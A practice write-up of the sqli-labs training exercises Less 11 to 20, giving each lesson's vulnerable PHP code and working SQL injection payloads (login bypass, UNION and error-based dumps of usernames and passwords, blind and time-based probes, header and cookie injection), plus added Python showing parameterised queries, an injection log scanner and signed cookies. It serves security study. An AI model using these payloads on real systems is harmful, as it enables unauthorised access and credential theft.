
SQLI-LAB practice notes (Less 11 - Less 20)

2016-07-15 20:55  387 views
Less - 11 Error Based- String
Test

Source Code

Solution

Less - 12 Error Based- Double quotes- String
Test

Source Code

Solution

Less - 13 Double Injection- String- with twist
Test

Source Code

Solution

Less - 14 Double Injection- Double quotes- String
Test

Source Code

Solution

Less - 15 Blind- Boolian Based- String
Test

Source Code

Solution

Less - 16 Blind- Time Based- Double quotes- String
Test

Source Code

Solution

Less - 17 Update Query- Error based - String
Test

Source Code

Solution

Less - 18 Header Injection- Error Based- string
Test

Source Code

Solution

Less - 19 Header Injection- Referer- Error Based- string
Test

Source Code

Solution

Less - 20 POST - Cookie injections - Uagent field - error based
Test

Source Code

Solution

The following are just the notes I wrote down while working through the sqli-lab exercises; they are for reference only.

Since I have already studied some SQL injection material, most of the content is not explained; if anything is unclear, please look it up with a search engine and you should find what you need.

Less - 11 Error Based- String

(Lesson 11: error-based - string type)

Test:

http://localhost/sqli-lab/Less-11/index.php uname=' &passwd=' &submit=Submit


Note: this one produces an error.

I recommend Firefox's HackBar or Burp for testing.

The POST format was captured with Burp; actually the variable names can be read straight from the page source (right-click, view source).

Ever heard of the "universal password"? Consider using it.

Source Code:

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
echo '<img src="../images/flag.jpg"  />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg" />';
}


Solution:

uname= ' or '1'='1 &passwd=  ' or '1'='1 &submit=Submit

uname= ' or 1=1 --+ &passwd= ' or 1=1 --+ &submit=Submit

uname= ' or 1=1 # &passwd= ' or 1=1 # &submit=Submit

Others:

uname= ' union select database(),6  --+ &passwd= ' union select database(),6  --+ &submit=Submit

uname= ' union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),6 --+ &passwd= '  --+ &submit=Submit

uname= ' union select (select group_concat(username) from security.users),6 --+ &passwd= '  --+ &submit=Submit
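To show why the login-bypass payloads above work and what the fix looks like, here is an added example (mine, not from this post or from the sqli-labs project) that rebuilds the Less-11 query in Python against an in-memory SQLite table standing in for security.users. login_vulnerable splices the inputs into the SQL text exactly as the PHP does; login_safe binds them as parameters. The sample rows, the function names and the SQLite `?` placeholder style are assumptions of this example.

```python
import sqlite3

# Constructed sample rows standing in for the lab's security.users table (values assumed).
SAMPLE_USERS = [("Dumb", "Dumb"), ("Angelina", "I-kill-you"), ("admin", "admin")]

# The two login-bypass payloads from the Less-11 solution above.
BYPASS_PAYLOADS = ["' or '1'='1", "' or 1=1 --+"]


def make_db():
    """Create an in-memory SQLite database with a users table like the lab's."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, uname, passwd):
    """Same construction as the Less-11 PHP: user input is spliced into the SQL text."""
    sql = (
        "SELECT username, password FROM users "
        "WHERE username='%s' and password='%s' LIMIT 0,1" % (uname, passwd)
    )
    return conn.execute(sql).fetchone()


def login_safe(conn, uname, passwd):
    """Hardened form: the SQL text is fixed and the values travel as bound parameters,
    so a quote in the input is plain data and can never close the string literal."""
    sql = "SELECT username, password FROM users WHERE username=? and password=? LIMIT 0,1"
    return conn.execute(sql, (uname, passwd)).fetchone()


def compare(uname, passwd):
    """Run the same credentials through both versions; return (vulnerable_row, safe_row)."""
    conn = make_db()
    try:
        return login_vulnerable(conn, uname, passwd), login_safe(conn, uname, passwd)
    finally:
        conn.close()


if __name__ == "__main__":
    print("valid creds      :", compare("Dumb", "Dumb"))
    for p in BYPASS_PAYLOADS:
        print("payload %-14r:" % p, compare(p, p))
```

With real credentials both versions return the Dumb row. With either payload the vulnerable version still returns the first row (the injected `or` makes the WHERE clause true for every row, and `--` comments out the rest), while the parameterised version returns nothing because it is looking for a user literally named `' or '1'='1`.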


Less - 12 Error Based- Double quotes- String

(Lesson 12: error-based - double quotes - string)

Test:

http://localhost/sqli-lab/Less-12/index.php uname= ") &passwd= " &submit=Submit


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '") and password=(" " ") LIMIT 0,1' at line 1

Note: this directly reveals that $uname and $passwd are wrapped in double quotes and one layer of parentheses.

Source Code:

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
echo '<img src="../images/flag.jpg"   />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg"   />';
}


Solution:

uname= ")or ("1")=("1 &passwd= ")or ("1")=("1 &submit=Submit

uname= ") or 1=1 # &passwd= ") or 1=1 # &submit=Submit

Others:

uname= ") union select database(),6 # &passwd= ") or 1=1 # &submit=Submit

uname= ") union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),6 # &passwd= ") or 1=1 # &submit=Submit

uname= ") union select (select group_concat(username) from security.users),6 # &passwd= ") or 1=1 # &submit=Submit


Less - 13 Double Injection- String- with twist

(Lesson 13: double injection - string type - with twist)

Test:

http://localhost/sqli-lab/Less-13/index.php uname= 0' &passwd= 0' &submit=Submit


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0' ') LIMIT 0,1' at line 1

Note: this directly reveals that $uname and $passwd are wrapped in single quotes and one layer of parentheses.

Source Code:

@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo '<img src="../images/flag.jpg"   />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg"   />';
}


Solution:

uname= ') or ('1')=('1 &passwd= ') or ('1')=('1 &submit=Submit

uname= ') or 1=1 # &passwd= ') or 1=1 # &submit=Submit

Others:

uname= ') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

uname= ') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

uname= ') union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

uname= ') union select 1,2 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

uname= ') union select 1,2 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

uname= ') union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

uname= ') union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit


Less - 14 Double Injection- Double quotes- String

(Lesson 14: double injection - double quotes - string)

Test:

http://localhost/sqli-lab/Less-14/index.php uname= "&passwd=' &submit=Submit


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '" " LIMIT 0,1' at line 1

Note: you can see that $uname and $passwd are wrapped only in double quotes.

Source Code:

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo '<img src="../images/flag.jpg" />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg"  />';
}


Solution:

uname= " or "1"="1&passwd=" or "1"="1 &submit=Submit

uname=" or 1=1 --+&passwd=" or 1=1 --+&submit=Submit

uname=" or 1=1 #&passwd=" or 1=1 #&submit=Submit

Others:

uname= " union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

uname= " union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

uname= " union select 1,2 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

uname= " union select 1,2 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

uname= " union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

uname= " union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit


Less - 15 Blind- Boolian Based- String

(Lesson 15: blind - boolean-based - string)

Test:

http://localhost/sqli-lab/Less-15/index.php uname="  or 1=1 # &passwd=" or 1=1 # &submit=Submit
uname=' or 1=1 #&passwd=' or 1=1 #&submit=Submit


Note: the first one fails and the second succeeds, so the input is wrapped in single quotes; no data is echoed back, so consider blind injection.

Source Code:

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo '<img src="../images/flag.jpg"  />';
}else{
echo '<img src="../images/slap.jpg"   />';
}


Solution:

uname=' or '1'='1 &passwd=' or '1'='1 &submit=Submit

uname=' or 1=1 #&passwd=' or 1=1 #&submit=Submit

Others:

uname=' or (length(database())) = 8 #&passwd=' or 1=1 #&submit=Submit

uname=' or (ascii(substr((select database()) ,1,1))) = 115 #&passwd=' or 1=1 #&submit=Submit


Less - 16 Blind- Time Based- Double quotes- String

(Lesson 16: blind - time-based - double quotes - string)

Test:

http://localhost/sqli-lab/Less-16/index.php uname=' or 1=1 # &passwd=' or 1=1 #&submit=Submit
uname=") or 1=1 # &passwd=") or 1=1 # &submit=Submit


Note: the first one fails and the second succeeds, so the input is wrapped in double quotes; no data is echoed back, so consider blind injection.

The response image reveals success or failure, so either boolean-based or time-based works.

Source Code:

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo '<img src="../images/flag.jpg"  />';
}else{
echo '<img src="../images/slap.jpg"  />';
}


Solution:

uname=") or ("1")=("1 &passwd=") or ("1")=("1 &submit=Submit

uname=") or 1=1 or if(1=1, sleep(1), null)  #&passwd=") or 1=1 #&submit=Submit

Others:

uname=") or (length(database())) = 8 #&passwd=") or 1=1 #&submit=Submit

uname=") or (ascii(substr((select database()) ,1,1))) = 115  or if(1=1, sleep(1), null)  #&passwd=") or 1=1 #&submit=Submit


Less - 17 Update Query- Error based - String

(Lesson 17: update query - error-based - string)

Test:

http://localhost/sqli-lab/Less-17/index.php

Note: the page title is password reset; the form has just a username field and a new-password field, so you only need to guess a valid username.

Source Code:

$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$row1 = $row['username'];
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
if (mysql_error()){
print_r(mysql_error());
}else{
}
echo '<img src="../images/flag1.jpg"   />';
}else{
echo '<img src="../images/slap1.jpg"   />';
}


Note: the $uname and $passwd fields are checked.

Solution:

uname=admin&passwd=666&submit=Submit

Others:

uname=Dumb&passwd=666&submit=Submit

uname=Angelina&passwd=666&submit=Submit

uname=secure&passwd=666&submit=Submit


Less - 18 Header Injection- Error Based- string

(Lesson 18: header injection - error-based - string)

Test:

http://localhost/sqli-lab/Less-18/index.php uname=admin&passwd=admin&submit=Submit


Your IP ADDRESS is: 127.0.0.1

Your User Agent is: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0

Note: I recommend Firefox's Modify Headers or Burp to change the User-Agent value.

I have already restored the database values that were changed in the previous exercise.

Source Code:

$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1){
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);
echo 'Your User Agent is: ' .$uagent;
print_r(mysql_error());
echo '<img src="../images/flag.jpg"  />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg"   />';
}


Note: the $uname and $passwd fields are checked.

Solution:

' or '1' = '1

Others:

' or (length(database())) = 8 or if(1=1, sleep(5), null) or '1' = '1


Note: the above are User-Agent values; this is time-based blind injection, with a 5 s delay if the guess is wrong.

Less - 19 Header Injection- Referer- Error Based- string

(Lesson 19: header injection - Referer field - error-based - string)

Test:

http://localhost/sqli-lab/Less-19/index.php uname=admin&passwd=admin&submit=Submit


Your IP ADDRESS is: 127.0.0.1

Your Referer is:

Note: I recommend Firefox's Modify Headers or Burp to change the Referer value.

Source Code:

$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1){
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
mysql_query($insert);
echo 'Your Referer is: ' .$uagent;
print_r(mysql_error());
echo '<img src="../images/flag.jpg" />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg"  />';
}


Note: the $uname and $passwd fields are checked.

Solution:

' or '1' = '1

Others:

' or (length(database())) = 8 or if(1=1, sleep(5), null) or '1' = '1


Note: the above are Referer values; this is time-based blind injection, with a 5 s delay if the guess is wrong.
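Less 18 and 19 (and the cookie in Less 20) inject through request headers rather than the URL or form body, which is exactly what many log pipelines and rule sets skip. As an added detection example (mine, not from this post or from sqli-labs), the Python below parses a few constructed key=value log lines carrying the User-Agent, Referer and cookie payloads from these lessons and flags the header fields that match coarse injection signatures. The log format, the field names and the rule set are assumptions of this example.

```python
import re
from collections import namedtuple

# Constructed sample log lines in a simple key=value format (a stand-in for whatever the
# web server or reverse proxy actually writes). The first is benign; the others carry the
# User-Agent, Referer and cookie payloads from Less 18-20.
SAMPLE_LOG = [
    'ip=127.0.0.1 path=/sqli-lab/Less-18/index.php ua="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" referer="-"',
    'ip=127.0.0.1 path=/sqli-lab/Less-18/index.php ua="\' or \'1\' = \'1" referer="-"',
    'ip=127.0.0.1 path=/sqli-lab/Less-19/index.php ua="Mozilla/5.0" referer="\' or (length(database())) = 8 or if(1=1, sleep(5), null) or \'1\' = \'1"',
    'ip=127.0.0.1 path=/sqli-lab/Less-20/index.php ua="Mozilla/5.0" referer="http://localhost/sqli-lab/Less-20/index.php" cookie="uname=\' union select 1,database(),6 or 1=1 #"',
]

# Header fields that reach SQL in Less 18-20 and are therefore worth inspecting.
INSPECTED_FIELDS = ("ua", "referer", "cookie")

# Coarse signatures for the techniques used in this write-up. They are a triage aid,
# not a complete WAF rule set: the real fix is parameterised queries in the application.
INJECTION_RULES = {
    "quote_or_tautology": re.compile(r"'\s*or\s+", re.IGNORECASE),
    "union_select": re.compile(r"\bunion\s+select\b", re.IGNORECASE),
    "time_delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE),
    "schema_probe": re.compile(r"\b(information_schema|database\s*\(\s*\))", re.IGNORECASE),
}

Finding = namedtuple("Finding", "line field rule")

# key=value pairs; a double-quoted value may contain spaces, an unquoted one may not.
_FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line):
    """Split one key=value log line into a dict of field -> value."""
    return {
        m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
        for m in _FIELD_RE.finditer(line)
    }


def scan_log(lines):
    """Return a Finding for every (line, header field, rule) combination that matches."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        record = parse_line(line)
        for field in INSPECTED_FIELDS:
            value = record.get(field, "")
            for rule, pattern in INJECTION_RULES.items():
                if pattern.search(value):
                    findings.append(Finding(lineno, field, rule))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("line %d: suspicious %s (%s)" % (f.line, f.field, f.rule))
```

On the sample the benign line produces nothing, the Less-18 line is flagged on its User-Agent, the Less-19 line on its Referer (tautology, sleep() and database() probe) and the Less-20 line on its cookie. Signature matching like this is noisy in both directions; it is useful for spotting that headers are being probed, not as a substitute for fixing the query construction.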

Less - 20 POST - Cookie injections - Uagent field - error based

(Lesson 20: POST - cookie injection - Uagent field - error-based)

Test:

http://localhost/sqli-lab/Less-20/index.php uname=Dumb&passwd=Dumb&submit=Submit


Note: log in first, e.g. with an account you already know: uname: Dumb, pwd: Dumb.

After logging in, the page shows the username, password, Id, cookie, IP address and User Agent.

You can use Firefox's Firebug to modify the value of $uname in the cookie.

Remember to change the expiry time as well, otherwise the cookie expires as soon as you have changed the $uname value...

Source Code:

Login part, when there is no cookie:
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
$cookee = $row1['username'];
if($row1){
setcookie('uname', $cookee, time()+3600);
header ('Location: index.php');
print_r(mysql_error());
echo '<img src="../images/flag.jpg" />';
}else{
print_r(mysql_error());
echo '<img src="../images/slap.jpg" />';
}
Login part, when there is a cookie:
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
$result=mysql_query($sql);
if (!$result){
die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
echo 'Your ID:' .$row['id'];
}else{
echo '<img src="../images/slap1.jpg" />';
}


Note: the $uname and $passwd fields are checked; when a cookie is present, the data shown from the database is username, password and id.

Solution:

Dumb ' or 1=1 #

Others:

' union select 1,database(),6 or 1=1 #

' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

' union select 1,group_concat(username),group_concat(password) from security.users  #


Note: the above are values of uname in the cookie.
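The root problem in Less 20 is that the cookie-branch code trusts $_COOKIE['uname'] as the logged-in identity and splices it straight into SQL, so anyone who can edit their own cookie can both impersonate and inject. As an added example (mine, not from this post or from sqli-labs) of the first half of the fix, the Python below issues the cookie as username plus an HMAC tag and refuses any value whose tag does not verify, so an edited uname is rejected before it gets anywhere near a query; the verified name would then be bound as a query parameter, never concatenated. The key, the cookie layout and the function names are assumptions of this example.

```python
import hashlib
import hmac

# Constructed placeholder key for this example; a real deployment loads it from
# configuration and keeps it out of source control.
SECRET_KEY = b"example-only-secret-key"


def issue_cookie(username, key=SECRET_KEY):
    """Build the cookie value as 'username|tag', with tag = HMAC-SHA256(key, username)."""
    tag = hmac.new(key, username.encode("utf-8"), hashlib.sha256).hexdigest()
    return "%s|%s" % (username, tag)


def verify_cookie(value, key=SECRET_KEY):
    """Return the username if the tag verifies, otherwise None (unsigned or tampered)."""
    # rpartition splits at the last '|': the tag is hex, so it never contains one,
    # while a username might.
    username, sep, tag = value.rpartition("|")
    if not sep:
        return None  # no tag at all, e.g. a hand-edited plain "Dumb"
    expected = hmac.new(key, username.encode("utf-8"), hashlib.sha256).hexdigest()
    # Constant-time comparison so the check leaks nothing about the expected tag.
    if not hmac.compare_digest(expected, tag):
        return None
    return username


if __name__ == "__main__":
    good = issue_cookie("Dumb")
    forged = "Dumb ' or 1=1 #|" + good.split("|", 1)[1]
    print("issued        :", good)
    print("verify issued :", verify_cookie(good))
    print("verify forged :", verify_cookie(forged))
```

Keeping the tag check on the server means the expiry trick mentioned above no longer matters either: whatever the browser stores, only a value the server itself signed is accepted as a username. This is integrity only, not confidentiality; the username is still readable in the cookie, which is fine because it is not a secret.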